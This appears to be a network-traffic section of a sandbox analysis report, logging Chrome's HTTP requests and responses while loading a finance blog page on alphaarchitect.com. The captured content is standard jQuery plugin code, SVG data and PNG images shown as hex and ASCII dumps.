                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC823INData Raw: 2e 33 30 36 37 20 33 38 2e 35 36 33 32 20 33 35 2e 37 39 30 36 20 33 38 2e 31 36 38 39 20 33 36 2e 35 34 33 35 20 33 38 2e 31 36 38 39 43 33 38 2e 30 31 37 37 20 33 38 2e 31 36 38 39 20 33 38 2e 33 39 38 36 20 33 39 2e 31 36 33 37 20 33 38 2e 33 39 38 36 20 34 30 2e 34 37 36 36 56 34 33 2e 36 36 32 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 35 35 35 35 35 35 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 34 20 34 33 2e 36 36 32 37 48 34 32 2e 34 32 32 36 4c 34 32 2e 33 39 31 33 20 34 33 2e 30 39 33 36 43 34 32 2e 31 37 36 32 20 34 33 2e 33 32 32 31 20 34 31 2e 37 36 33 39 20 34 33 2e 37 38 33 37 20 34 30 2e 39 33 34 39 20 34 33 2e 37 38 33 37 43 34 30 2e 30 33 38 37 20 34 33 2e 37 38 33 37 20 33 39 2e 30 38 38 37 20 34 33 2e
                                                                                                                                                                                                                                                                        Data Ascii: .3067 38.5632 35.7906 38.1689 36.5435 38.1689C38.0177 38.1689 38.3986 39.1637 38.3986 40.4766V43.6627Z" fill="#555555"/> <path d="M44 43.6627H42.4226L42.3913 43.0936C42.1762 43.3221 41.7639 43.7837 40.9349 43.7837C40.0387 43.7837 39.0887 43.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.449754141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC851OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2b6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147801
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9b37f5fde93-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC701INData Raw: 32 62 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 2c 61 3d 30 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 26 26 28 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6d 2c 65 29 2c 6a 51 75 65 72 79 2e 66 78 2e 74 69 63 6b 28 29 29 7d 2c 72 3d 5b 22 6d 73 22 2c 22 6d 6f 7a 22 2c 22 77 65 62 6b 69 74 22 2c 22 6f 22 5d 2c 6f 3d 30 2c 75 3d 72 2e 6c 65 6e 67 74 68 3b 6f 3c 75 26 26 21 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3b 2b 2b 6f 29 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3d 6e 5b 72 5b 6f 5d 2b 22 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 22 5d 2c 6e 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61
                                                                                                                                                                                                                                                                        Data Ascii: 2b6!function(e,n,t){for(var i,a=0,m=function(e){i&&(n.requestAnimationFrame(m,e),jQuery.fx.tick())},r=["ms","moz","webkit","o"],o=0,u=r.length;o<u&&!n.requestAnimationFrame;++o)n.requestAnimationFrame=n[r[o]+"RequestAnimationFrame"],n.cancelAnimationFra
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.44975589.35.237.1704435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC389OUTGET /buttons/printfriendly-pdf-button-nobg-md.png HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cdn.printfriendly.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC1069INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                        Content-Length: 1597
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Server: BunnyCDN-RI1-892
                                                                                                                                                                                                                                                                        CDN-PullZone: 29989
                                                                                                                                                                                                                                                                        CDN-Uid: c46cf0ce-de12-43ee-84e2-564af22e66fd
                                                                                                                                                                                                                                                                        CDN-RequestCountryCode: US
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Type
                                                                                                                                                                                                                                                                        Age: 1371
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                        ETag: "4fa09b16d257ef2d09ffbafc25a2049c"
                                                                                                                                                                                                                                                                        Last-Modified: Wed, 04 Oct 2017 08:48:28 GMT
                                                                                                                                                                                                                                                                        x-goog-generation: 1507106908408014
                                                                                                                                                                                                                                                                        x-goog-metageneration: 2
                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 1597
                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=wAZd1Q==
                                                                                                                                                                                                                                                                        x-goog-hash: md5=T6CbFtJX7y0J/7r8JaIEnA==
                                                                                                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY1DUu7lpKlaIjtosozspkEM354ROWI1OieKX2G0t4XiQ7GPmsKy2NRZp86h9bZ6x45_IyjO1g9Q5Q
                                                                                                                                                                                                                                                                        CDN-ProxyVer: 1.05
                                                                                                                                                                                                                                                                        CDN-RequestPullSuccess: True
                                                                                                                                                                                                                                                                        CDN-RequestPullCode: 200
                                                                                                                                                                                                                                                                        CDN-CachedAt: 10/28/2024 09:04:04
                                                                                                                                                                                                                                                                        CDN-EdgeStorageId: 892
                                                                                                                                                                                                                                                                        CDN-Status: 200
                                                                                                                                                                                                                                                                        CDN-RequestTime: 0
                                                                                                                                                                                                                                                                        CDN-RequestId: de2ce662099bee7e259fb8bbc2d1398f
                                                                                                                                                                                                                                                                        CDN-Cache: HIT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC1597INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7c 00 00 00 1e 08 06 00 00 00 ee 22 7a ef 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 f4 49 44 41 54 68 05 ed 58 6b 4c 5c 45 14 9e bb bb b0 5b 40 9b 50 15 36 4b 4b da 9f 42 a1 f5 45 ac af 84 c4 1f da 9a f8 a0 46 13 6d ec 9f 82 89 05 43 4c 58 40 22 8a e0 62 23 92 ad 55 52 6b 63 6a 53 cd 36 a8 4d ac f8 43 c1 96 d6 62 52 69 a0 82 a9 a8 3f da ae 80 36 94 f7 ee c2 3e fc e6 ae 4b 66 6f ee 5e e6 f6 f2 58 cd dc 64 98 33 67 ce 39 73 ce f9 e6 cc cc 42 88 f8 44 06 44 06 44 06 44 06 44 06 44 06 44 06 44 06 92 3e 03 92 51 0f 77 7a f2 52 bd 26 6f 99 45 8a 94 85 c2 64 53 28 44 ac 6a 36 7b 9e 99 30 bc 96 9a dd 15 e2 39 0d ac e3 32 a0 bb e4 aa 16 23 16 ef f5 ac 73 8c 98 ae 76 65 ad 95 ec f9 b9 a6 8c 75
                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR|"zgAMAaIDAThXkL\E[@P6KKBEFmCLX@"b#URkcjS6MCbRi?6>Kfo^Xd3g9sBDDDDDDDD>QwzR&oEdS(Dj6{092#sveu


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        11192.168.2.449757141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC836OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-8ea"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147802
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bcd9a54270-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC878INData Raw: 38 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 65 29 7d 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3d 6e 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 6e 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 61 73 69 6e 67 2e 6a 73 77 69 6e 67 3d 6e 2e 65 61 73 69 6e 67 2e 73 77 69 6e 67 3b 76 61 72 20 65 3d 4d 61 74 68 2e 70 6f 77 2c
                                                                                                                                                                                                                                                                        Data Ascii: 8ea!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?exports=n(require("jquery")):n(jQuery)}(function(n){n.easing.jswing=n.easing.swing;var e=Math.pow,
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 6e 2a 6e 2a 6e 2a 6e 7d 2c 65 61 73 65 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 31 2d 65 28 31 2d 6e 2c 34 29 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3c 2e 35 3f 38 2a 6e 2a 6e 2a 6e 2a 6e 3a 31 2d 65 28 2d 32 2a 6e 2b 32 2c 34 29 2f 32 7d 2c 65 61 73 65 49 6e 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2a 6e 2a 6e 2a 6e 2a 6e 7d 2c 65 61 73 65 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 31 2d 65 28 31 2d 6e 2c 35 29 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3c 2e 35 3f 31 36 2a 6e 2a 6e 2a 6e 2a 6e 2a
                                                                                                                                                                                                                                                                        Data Ascii: n*n*n*n},easeOutQuart:function(n){return 1-e(1-n,4)},easeInOutQuart:function(n){return n<.5?8*n*n*n*n:1-e(-2*n+2,4)/2},easeInQuint:function(n){return n*n*n*n*n},easeOutQuint:function(n){return 1-e(1-n,5)},easeInOutQuint:function(n){return n<.5?16*n*n*n*n*
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC42INData Raw: 20 6e 3c 2e 35 3f 28 31 2d 66 28 31 2d 32 2a 6e 29 29 2f 32 3a 28 31 2b 66 28 32 2a 6e 2d 31 29 29 2f 32 7d 7d 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: n<.5?(1-f(1-2*n))/2:(1+f(2*n-1))/2}})})
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        12192.168.2.449756141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC837OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-6e6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147802
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bcde1e43f8-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC878INData Raw: 36 65 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 66 69 74 56 69 64 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 7b 63 75 73 74 6f 6d 53 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 69 67 6e 6f 72 65 3a 6e 75 6c 6c 7d 3b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 66 69 74 2d 76 69 64 73 2d 73 74 79 6c 65 22 29 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 70 3e 78 3c
                                                                                                                                                                                                                                                                        Data Ascii: 6e6!function(t){"use strict";t.fn.fitVids=function(e){var i={customSelector:null,ignore:null};if(!document.getElementById("fit-vids-style")){var r=document.head||document.getElementsByTagName("head")[0],a=document.createElement("div");a.innerHTML='<p>x<
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC895INData Raw: 68 69 73 29 2e 66 69 6e 64 28 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 28 61 3d 28 61 3d 61 2e 6e 6f 74 28 22 6f 62 6a 65 63 74 20 6f 62 6a 65 63 74 22 29 29 2e 6e 6f 74 28 72 29 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 69 66 28 21 28 65 2e 70 61 72 65 6e 74 73 28 72 29 2e 6c 65 6e 67 74 68 3e 30 7c 7c 22 65 6d 62 65 64 22 3d 3d 3d 74 68 69 73 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 65 2e 70 61 72 65 6e 74 28 22 6f 62 6a 65 63 74 22 29 2e 6c 65 6e 67 74 68 7c 7c 65 2e 70 61 72 65 6e 74 28 22 2e 66 6c 75 69 64 2d 77 69 64 74 68 2d 76 69 64 65 6f 2d 77 72 61 70 70 65 72 22 29 2e 6c 65 6e 67 74 68 29 29 7b 65 2e 63 73 73 28 22 68 65 69 67 68 74 22 29 7c 7c 65 2e 63 73 73 28
                                                                                                                                                                                                                                                                        Data Ascii: his).find(e.join(","));(a=(a=a.not("object object")).not(r)).each(function(){var e=t(this);if(!(e.parents(r).length>0||"embed"===this.tagName.toLowerCase()&&e.parent("object").length||e.parent(".fluid-width-video-wrapper").length)){e.css("height")||e.css(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        13192.168.2.449758141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC565OUTGET /wp-content/uploads/2019/12/santa-logo-e1577124084176.png HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC454INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                        Content-Length: 7876
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                                                        Cf-Polished: origSize=9009
                                                                                                                                                                                                                                                                        ETag: "632c27ff-2331"
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 22 Sep 2022 09:16:47 GMT
                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bcef3f0f6b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fb 00 00 00 64 08 06 00 00 00 40 42 46 30 00 00 1e 8b 49 44 41 54 78 da ec d8 bf 6b 14 41 14 07 f0 ef 9b db 3b 13 08 84 84 fc 50 13 30 11 21 8d 82 01 9b 14 a6 08 88 56 92 2a 08 36 a2 b5 88 b5 95 75 fa 90 c2 ca 26 7f 84 0a a2 8d 4d 50 52 29 98 04 15 84 a0 42 0c 26 17 77 76 be 5f 8b 70 9e 1c c7 dd 71 28 38 97 f9 c0 63 87 5d d8 62 79 df 79 cc 22 49 92 24 6a 61 75 d5 fc d2 52 f9 70 7c bc af 3a 38 d8 bf 3f 32 d2 5f 5d 5c 2c ff 5c 59 b1 f4 75 92 e3 c8 c2 d4 14 7a 48 bf aa d5 19 79 7f 49 66 b3 72 ee 14 bd 1f 90 54 a6 59 50 96 7d 27 b0 23 69 9b d2 47 02 ef 95 65 db 18 18 d8 05 c0 d4 0e 49 2f 33 2d 2c 20 72 a6 8d 8d 51 01 f3 92 6e 88 bc 2c 69 84 80 93 04 01 20 d0 ec 5a 10 d8 93 d9 26 9d 5b 97 d9 3a c9 4d 95
                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRd@BF0IDATxkA;P0!V*6u&MPR)B&wv_pq(8c]byy"I$jauRp|:8?2_]\,\YuzHyIfrTYP}'#iGeI/3-, rQn,i Z&[:M
